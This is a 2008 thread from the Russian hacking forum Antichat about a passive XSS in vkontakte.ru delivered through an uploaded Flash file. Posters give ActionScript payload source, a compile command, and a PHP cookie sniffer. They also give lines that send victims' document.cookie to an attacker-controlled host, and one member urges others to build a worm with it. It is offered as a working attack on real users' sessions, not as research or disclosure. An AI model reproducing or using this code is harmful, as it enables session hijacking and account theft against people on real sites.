Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
vkontakte.ru passive xss (swf) |
25.03.2008, 10:13
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
vkontakte.ru passive xss (swf)
Качаем mtask
Создаём файлик hek.as с содержанием
PHP код:
class hek{
function hek() {
}
static function main(mc) {
getURL("javascript:alert(document.cookie);");
}
}
Далее компилим
Код:
mtasc.exe -swf hek.swf -main -header 1:1:1 hek.as
В настройках делаем доступным сервис "Приложения", обзываем его как-нить и заливаем наш скомпиленный hek.swf +)
Смотрим созданное "приложение" и выдираем ссылку на swf
PHP код:
...
<script type="text/javascript">
//<
Последний раз редактировалось +toxa+; 25.03.2008 в 10:35..
|
|
|
25.03.2008, 10:27
|
|
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814
Репутация:
3876
|
|
Фига Тох 
+5 |
|
|
|
25.03.2008, 10:43
|
|
Познавший АНТИЧАТ
Регистрация: 18.06.2005
Сообщений: 1,004
Провел на форуме:
2821162
Репутация:
1320
|
|
Авторегер есть, спамилка по id есть, теперь и ксс есть. Хуярьте товарищи червя...  |
|
|
|
25.03.2008, 13:44
|
|
Banned
Регистрация: 04.12.2005
Сообщений: 826
Провел на форуме:
5223479
Репутация:
3813
|
|
Или я непохеккер или оно не работает. Алерты все на ура, но при добавлении конструкций типа:
Код:
javascript:eval(String.fromCharCode(bla-bla-bla))
выплёвывает содержимое bla-bla-bla, где bla-bla-bla - енто закодированная хрень:
Код:
img=new Image(); img.src="http://гаткей_снеффер.gif?"+document.cookie;
Последний раз редактировалось b00zy_c0d3r; 25.03.2008 в 13:53..
|
|
|
|
25.03.2008, 14:00
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028
Репутация:
2371
|
|
Ха....ништяк, молодец
|
|
|
|
26.03.2008, 01:35
|
|
Members of Antichat - Level 5
Регистрация: 27.01.2006
Сообщений: 258
Провел на форуме:
6127131
Репутация:
774
|
|
sniffer.php
PHP код:
<?
$ref = $_SERVER['HTTP_REFERER'];
$infa = $_SERVER['REMOTE_ADDR'];
$infa .= " : ";
$infa .= $_GET['s'];
$infa .= "\r\n\r\n";
$f=fopen("log.txt","a+");
fputs($f,$infa);
fclose($f);
Header("Location: http://www.vkontakte.ru"); //.$ref);
?>
attack.swf
PHP код:
getURL("javascript:location.href=\"http://yourhost/sniffer.php?s=\"+document.cookie;");
__________________
Завтра будет.Лучше.
|
|
|
|
27.03.2008, 01:22
|
|
Seo Pozitive
Регистрация: 13.08.2004
Сообщений: 779
Провел на форуме:
5581277
Репутация:
1635
|
|
Может я не фтыкнул чет, но...когда вручную заходишь на демку
то куки норм, а если через сайт подставной...т.е. кодом, то приходит
Код:
__utma=52566834.124252957.1203944691.1203944691.1206562305.2;%20__utmz=52566834.1203944691.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none);%20__utmb=52566834;%20__utmc=52566834;%20jcpu=1;%20pcnt=4;%20pcls=1
|
|
|
|
27.03.2008, 12:05
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062
Репутация:
1079
|
|
Все очень просто. Если вы делаете embed то получаете куки своего сайта. А если делать iframe то будут куки vkontakte
|
|
|
|
27.03.2008, 14:12
|
|
Seo Pozitive
Регистрация: 13.08.2004
Сообщений: 779
Провел на форуме:
5581277
Репутация:
1635
|
|
Swf у меня не вызывается через ифрейм
|
|
|
|
27.03.2008, 16:40
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062
Репутация:
1079
|
|
гм у меня на опере вызывается
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
